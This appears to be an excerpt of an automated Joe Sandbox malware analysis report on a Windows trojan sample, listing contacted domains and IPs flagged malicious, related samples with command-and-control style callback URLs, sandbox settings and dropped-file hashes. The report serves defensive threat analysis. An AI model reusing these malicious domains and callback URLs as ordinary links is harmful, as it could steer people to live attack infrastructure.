http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
https://www.namebrightstatic.com/images/error_board.png)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.monalizacos.com	216.24.179.55	true	true	0%, Virustotal, Browse	unknown
ghs.googlehosted.com	216.58.207.179	true	true	0%, Virustotal, Browse	unknown
nbparking-lb1-e8979d80a94bc16b.elb.us-east-1.amazonaws.com	3.234.181.234	true	false		high
www.artdonline.com	199.59.242.153	true	true		unknown
www.cookiefoo.com	unknown	unknown	true		unknown
www.milkandmemories.com	unknown	unknown	true		unknown
www.hull3dprints.com	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.cobj	4NoiNHCNoU.exe, 00000000.00000003.672814829.0000000008E81000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.cobj$	4NoiNHCNoU.exe, 00000000.00000003.659052889.0000000008E71000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/g	4NoiNHCNoU.exe, 00000000.00000002.680921348.0000000008E82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schema.org/WebPage	4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	false		high
http://statcounter.com/	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false		high
http://ns.adobe.c/g$	4NoiNHCNoU.exe, 00000000.00000003.659052889.0000000008E71000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.namebrightstatic.com/images/header_bg.png)	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.namebrightstatic.com/images/bg.png)	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://c.statcounter.com/9484561/0/b0cbab70/1/	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false		high
http://ocsp.pki.goog/gts1o1core0	4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.namebrightstatic.com/images/site_maintenance.png)	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namebrightstatic.com/images/logo_off.gif)	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.ado/1$	4NoiNHCNoU.exe, 00000000.00000003.659052889.0000000008E71000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adb	4NoiNHCNoU.exe, 00000000.00000003.672814829.0000000008E81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000003.00000002.1005683210.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	4NoiNHCNoU.exe, 00000000.00000002.673522377.0000000003261000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.ado/1	4NoiNHCNoU.exe, 00000000.00000003.672814829.0000000008E81000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.namebrightstatic.com/images/error_board.png)	help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
216.24.179.55	unknown	Canada	25820	IT7NETCA	true
199.59.242.153	unknown	United States	395082	BODIS-NJUS	true
216.58.207.179	unknown	United States	15169	GOOGLEUS	true
3.234.181.234	unknown	United States	14618	AMAZON-AESUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344528
Start date:	26.01.2021
Start time:	17:06:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 56s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	4NoiNHCNoU.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/2@5/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.5% (good quality ratio 10.1%) Quality average: 71.3% Quality standard deviation: 33%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 168.61.161.212, 172.217.23.36, 51.104.139.180, 95.101.22.216, 95.101.22.224, 23.55.110.161, 23.55.110.134, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:07:45	API Interceptor	1x Sleep call for process: 4NoiNHCNoU.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
199.59.242.153	mtsWWNDaNF.exe	Get hash	malicious	Browse	www.traptlongview.com/csv8/?9r=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjOxon4Fjc0&w2=jFQp32IXi
	0iEsxw3D7A.exe	Get hash	malicious	Browse	www.alwayadopt.com/8rg4/?6l=WsO1qizzdQOco4NPhHaDnsysS09xwMceuBioxc/BmkObRZ5eaS/j9hCi62iIB+iWgsUx&_FN4EJ=3fnDH
	FHT210995.exe	Get hash	malicious	Browse	www.lvc.xyz/wpsb/?DxoLn=lzYwQ3KT7EiJU+03KAj/f46AYxUq3OFtotwkxvEGgl/73ySRAFXID91Rm9K4N5rAjQtd&JtI=K6AhtzFPqrb
	5I7l3T5ZA5.exe	Get hash	malicious	Browse	www.bigdudedesign.com/xle/?ndidgN=R2JdCb&JR-=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7tc0TzIhsDi0JEkXg==
	SKM_C221200706052800.exe	Get hash	malicious	Browse	www.naturalhealthadvisery.com/s9zh/?aFNTkfLx=qOWGaJUZnCmstWLywjk1J1tsNforY2PNRnBf44673G+p7iqzfKfodzHj2/eLCWvbe38h&O2MtVN=iJEt_VihLTLX2JB0
	f4tP1FPuGN.exe	Get hash	malicious	Browse	www.traptlongview.com/csv8/?4h0=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWP0ypLDGU9liE66TA==&wR=LJEtMDJ
	New -PO January.xlsx	Get hash	malicious	Browse	www.fallguysmovile.com/kgw/?y488D=Q8j3zo2KyRwXAD6KgUT3xIethN2qaDDEMDXD+QAzr+6/Eqg+bI2L4Bsu/fUoKKK2wv8fAQ==&_L34=kt84IRmHLXo
	74852.exe	Get hash	malicious	Browse	www.pciappky.com/nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA
	in.exe	Get hash	malicious	Browse	www.demenageseul.com/uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI
	zHgm9k7WYU.exe	Get hash	malicious	Browse	www.bigdudedesign.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0
	65BV6gbGFl.exe	Get hash	malicious	Browse	www.fallguysmovile.com/kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv
	PO85937758859777.xlsx	Get hash	malicious	Browse	www.alwayadopt.com/8rg4/?RJ=WsO1qiz2dXOYooBDjHaDnsysS09xwMceuB64tfjAiEOaRoVYdCuvrl6g5TO0aeWlvtBBiA==&LFQHH=_pgx3Rd
	PO#218740.exe	Get hash	malicious	Browse	www.shelvesthatslude.com/wpsb/?Wxo=rpLKkbKOXOuXHBcSnbCAYX8fIodJm2eBCOkizxG+Jmq98pcfRrdFVbp7k49Tb//P+n9l&vB=lhv8
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	www.laalianza.net/nki/?-Z1l=PROIUmUOyDGddH4liQ5hJmVkj46+Q85xpoxC45PqJI4e45Ope3SXSrB15gOtY6GR/pks5ou7bA==&5ju=UlSpo
	c6Rg7xug26.exe	Get hash	malicious	Browse	www.fallguysmovile.com/kgw/?JfExsTlp=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864+OaOF7shv&njnddr=RhlPiv
	IRS Notice Letter pdf document.exe	Get hash	malicious	Browse	www.myaarpdentalpln.com/09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS
	mQFXD5FxGT.exe	Get hash	malicious	Browse	thevampire_vvv.byethost32.com/loglogin.html
	099898892.exe	Get hash	malicious	Browse	www.fux.xyz/nt8e/?2dj=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&BR-LnJ=YVJpeDOX
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	ww1.survey-smiles.com/
	SAWR000148651.exe	Get hash	malicious	Browse	www.phymath.science/6bu2/?u6u0=C0Tcv4PEDaSqiqbiBHmU4chmBJ2Ib35dQ7WAYQJ79jvi7RJiRJeSkc3aZR5iI925ug+e&9r4l2=xPJtQXiX
216.58.207.179	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	www.bondstreet.management/oge8/?EZA0Ip=Yfxnw+nso+OJBGuY8BdaIL8l7PpgKam5JRC37XhTIanNd1mD6p6qlcL2F05ShQ8JY0Vj&GzrLW=VDKPTvrxnd141V
	SecuriteInfo.com.Trojan.PackedNET.507.15470.exe	Get hash	malicious	Browse	www.prayerswithmary.com/gqx2/?t6Al=njfRlhVhnDYToBqQ0FRdDD3+20pPuTSuw14qi8c71i/0kv2FA+P8Eg7R/AFYjoWjMB0l&kPm0q=J4kl
	Qs6ySVV95N.exe	Get hash	malicious	Browse	www.nikolaichan.com/bw82/?9rN46F=xVJHBdo8&u4Td2=nYWM/rwSzX9MyPPoZtrUCAZuUhwRv7E+HNbrnomLB0MgbyAj2S+JrZFjkPtSeg4DEaosV+KRsQ==
	IRS Notice Letter pdf document.exe	Get hash	malicious	Browse	www.thebuzztraders.com/09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS
	3tTw14SBUw.exe	Get hash	malicious	Browse	www.byronhobbs.com/3nk4/
	52Order Book PTA MACHINO (M) SDN BHD.xlsx.exe	Get hash	malicious	Browse	www.beautyandthebesttravel.com/gh/
	26NEFT-PAYMENT.exe	Get hash	malicious	Browse	www.lorelcraigcollaborative.com/ne/?xL0T0t=B0c9hitv+8rnNFPQQIKvZd0beMBibrTUEh8S1ZB3EHLuGXHfvUfU74cqdLWDbQExUnGw&1bd=Sn1lLTTHhv-tPRH

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
nbparking-lb1-e8979d80a94bc16b.elb.us-east-1.amazonaws.com	1D1PBttduH.exe	Get hash	malicious	Browse	3.234.181.234
	NXmokFkh3R.exe	Get hash	malicious	Browse	3.234.181.234
	mtq4WgX12m.exe	Get hash	malicious	Browse	3.234.181.234
	4F1V33O54M.exe	Get hash	malicious	Browse	3.234.181.234
	New Additional Agreement.exe	Get hash	malicious	Browse	3.234.181.234
	eBsxgyesfM.exe	Get hash	malicious	Browse	3.234.181.234
	ScanHP20.10.20.exe	Get hash	malicious	Browse	3.234.181.234
	Scan_Xerox10.18.2020.exe	Get hash	malicious	Browse	3.234.181.234
	Shipment doc, INV+BL.exe	Get hash	malicious	Browse	3.234.181.234
	Spare Parts Request MV Accord 8.13.20_pdf.exe	Get hash	malicious	Browse	3.234.181.234
	INVOICECRFV034.exe	Get hash	malicious	Browse	3.234.181.234
	130003150.exe	Get hash	malicious	Browse	3.234.181.234
	Revised BL.exe	Get hash	malicious	Browse	3.234.181.234
	script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exe	Get hash	malicious	Browse	3.234.181.234
	VA_-_New_Wave_Club_Class-X_Box_(Sinners_Day_2011)-3CD-2011 (2).exe	Get hash	malicious	Browse	3.234.181.234
ghs.googlehosted.com	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	216.58.207.179
	SecuriteInfo.com.Trojan.PackedNET.507.15470.exe	Get hash	malicious	Browse	216.58.207.179
	Qs6ySVV95N.exe	Get hash	malicious	Browse	216.58.207.179
	0f9zzITIbk.exe	Get hash	malicious	Browse	172.217.22.243
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	142.250.180.83
	P4fZLHrU6d.exe	Get hash	malicious	Browse	172.217.168.19
	arrival_notice.xlsx	Get hash	malicious	Browse	172.217.168.19
	Draft FCR-HBL.exe	Get hash	malicious	Browse	172.217.168.83
	QN-03507-20.exe	Get hash	malicious	Browse	108.177.119.121
	3v3Aosgyxw.exe	Get hash	malicious	Browse	108.177.119.121
	20210111 Virginie.exe	Get hash	malicious	Browse	108.177.119.121
	81msxxUisn.exe	Get hash	malicious	Browse	108.177.119.121
	LOI.exe	Get hash	malicious	Browse	108.177.119.121
	Revise Order.exe	Get hash	malicious	Browse	108.177.119.121
	IRS Notice Letter pdf document.exe	Get hash	malicious	Browse	216.58.207.179
	PO21010699XYJ.exe	Get hash	malicious	Browse	216.58.198.51
	current productlist.exe	Get hash	malicious	Browse	216.58.198.51
	https://da930.infusion-links.com/api/v1/click/5782635710906368/4861645707411456	Get hash	malicious	Browse	172.217.168.83
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	172.217.168.83
	Copy111.exe	Get hash	malicious	Browse	172.217.168.83

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IT7NETCA	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	64.64.251.229
	utox.exe	Get hash	malicious	Browse	176.122.158.102
	0dJ67KOYIS.exe	Get hash	malicious	Browse	23.105.200.208
	v7tCVYRqnH.exe	Get hash	malicious	Browse	23.105.200.208
	COMMERCIAL INVOICE, BILL OF LADING, DOC.exe	Get hash	malicious	Browse	74.120.168.133
	M36vYI4j67.exe	Get hash	malicious	Browse	97.64.22.226
	fFH9LTYQsa.exe	Get hash	malicious	Browse	97.64.22.226
	derApTVcOg.exe	Get hash	malicious	Browse	97.64.22.226
	dkKLT12ieu.exe	Get hash	malicious	Browse	97.64.22.226
	PO_08102020EX.doc	Get hash	malicious	Browse	144.34.218.189
	purchase order.exe	Get hash	malicious	Browse	67.218.128.107
BODIS-NJUS	mtsWWNDaNF.exe	Get hash	malicious	Browse	199.59.242.153
	0iEsxw3D7A.exe	Get hash	malicious	Browse	199.59.242.153
	FHT210995.exe	Get hash	malicious	Browse	199.59.242.153
	5I7l3T5ZA5.exe	Get hash	malicious	Browse	199.59.242.153
	SKM_C221200706052800.exe	Get hash	malicious	Browse	199.59.242.153
	f4tP1FPuGN.exe	Get hash	malicious	Browse	199.59.242.153
	New -PO January.xlsx	Get hash	malicious	Browse	199.59.242.153
	74852.exe	Get hash	malicious	Browse	199.59.242.153
	in.exe	Get hash	malicious	Browse	199.59.242.153
	zHgm9k7WYU.exe	Get hash	malicious	Browse	199.59.242.153
	65BV6gbGFl.exe	Get hash	malicious	Browse	199.59.242.153
	PO85937758859777.xlsx	Get hash	malicious	Browse	199.59.242.153
	PO#218740.exe	Get hash	malicious	Browse	199.59.242.153
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	199.59.242.153
	c6Rg7xug26.exe	Get hash	malicious	Browse	199.59.242.153
	sample20210111-01.xlsm	Get hash	malicious	Browse	199.59.242.150
	IRS Notice Letter pdf document.exe	Get hash	malicious	Browse	199.59.242.153
	mQFXD5FxGT.exe	Get hash	malicious	Browse	199.59.242.153
	099898892.exe	Get hash	malicious	Browse	199.59.242.153
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	199.59.242.153
AMAZON-AESUS	win32.exe	Get hash	malicious	Browse	52.44.229.95
	order pdf.exe	Get hash	malicious	Browse	3.223.115.185
	SecuriteInfo.com.Variant.Zusy.363976.7571.exe	Get hash	malicious	Browse	23.21.126.66
	Shipping Documents.doc	Get hash	malicious	Browse	54.235.83.248
	gPGTcEMoM1.exe	Get hash	malicious	Browse	52.23.148.124
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	3.223.115.185
	8Aobnx1VRi.exe	Get hash	malicious	Browse	23.21.76.253
	RFQ-Strip Casting Line.exe	Get hash	malicious	Browse	54.235.142.93
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	3.223.115.185
	NEW ORDER PO 20200909.exe	Get hash	malicious	Browse	23.21.252.4
	bin.sh	Get hash	malicious	Browse	18.210.13.68
	file.exe	Get hash	malicious	Browse	54.225.220.115
	Tebling_Resortsac_FILE-HP38XM.htm	Get hash	malicious	Browse	54.158.2.202
	file.exe	Get hash	malicious	Browse	54.225.242.59
	SecuriteInfo.com.Variant.MSILPerseus.224695.13350.exe	Get hash	malicious	Browse	23.21.252.4
	1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].html	Get hash	malicious	Browse	3.218.111.133
	Dropper.xlsm	Get hash	malicious	Browse	3.220.8.221
	IDA Pro 7.0 2017 Incl. Hex-Rays Decompilers (LEAKED) [Ny2rogen].exe	Get hash	malicious	Browse	54.235.147.252
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	34.225.41.153
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	54.225.115.255
GOOGLEUS	bXFjrxjRlb.exe	Get hash	malicious	Browse	34.102.136.180
	xl2Ml2iNJe.exe	Get hash	malicious	Browse	34.102.136.180
	eEXZHxdxFE.exe	Get hash	malicious	Browse	35.228.108.144
	v07PSzmSp9.exe	Get hash	malicious	Browse	34.102.136.180
	o3Z5sgjhEM.exe	Get hash	malicious	Browse	35.186.223.98
	ltf94qhZ37.exe	Get hash	malicious	Browse	35.228.108.144
	NEW ORDER.xlsx	Get hash	malicious	Browse	34.102.136.180
	Inquiry_73834168_.xlsx	Get hash	malicious	Browse	34.102.136.180
	winlog(1).exe	Get hash	malicious	Browse	34.102.136.180
	win32.exe	Get hash	malicious	Browse	34.102.136.180
	DAT.doc	Get hash	malicious	Browse	35.200.206.198
	Bestellung.doc	Get hash	malicious	Browse	172.217.6.174
	.01.2021a.js	Get hash	malicious	Browse	35.228.108.144
	QT21006189.exe	Get hash	malicious	Browse	108.177.119.109
	1-26.exe	Get hash	malicious	Browse	34.102.136.180
	Request.xlsx	Get hash	malicious	Browse	34.102.136.180
	INV_TMB_210567Y00.xlsx	Get hash	malicious	Browse	34.102.136.180
	RFQ.xlsx	Get hash	malicious	Browse	34.102.136.180
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	34.102.136.180
	RF-E93-STD-068 SUPPLIES.xlsx	Get hash	malicious	Browse	34.102.136.180

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	SoPwZKv1Mf.exe	Get hash	malicious	Browse
	bXFjrxjRlb.exe	Get hash	malicious	Browse
	Generator.cont.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	560911_P.EXE	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	IMG_61779.pdf.exe	Get hash	malicious	Browse
	IMG_5391.EXE	Get hash	malicious	Browse
	czZ769nM6r.exe	Get hash	malicious	Browse
	IMG_1107.EXE	Get hash	malicious	Browse
	r3q6Bv8naR.exe	Get hash	malicious	Browse
	sy1RnlHl8Y.exe	Get hash	malicious	Browse
	qyMlTIBawC.exe	Get hash	malicious	Browse
	Qn2AQrgfqJ.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.509.28611.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.509.17348.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.509.7497.exe	Get hash	malicious	Browse
	IMG_12283.exe	Get hash	malicious	Browse
	IMG_06176.pdf.exe	Get hash	malicious	Browse
	IMG_50617.pdf.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4NoiNHCNoU.exe.log Download File
Process:	C:\Users\user\Desktop\4NoiNHCNoU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	5.355036985457214
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovitHoxHhAHKzvr1qHj:iqXeqm00YqhQnouRqjoKtIxHeqzTwD
MD5:	CDA95282F22F47DA2FDDC9E912B67FEF
SHA1:	67A40582A092B5DF40C3EB61A361A2D336FC69E0
SHA-256:	179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
SHA-512:	1D151D92AE982D2149C2255826C2FFB89A475A1EB9B9FE93DC3706F3016CD6B309743B36A4D7F6D68F48CE25391FDA7A2BAE42061535EEA7862460424A3A2036
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

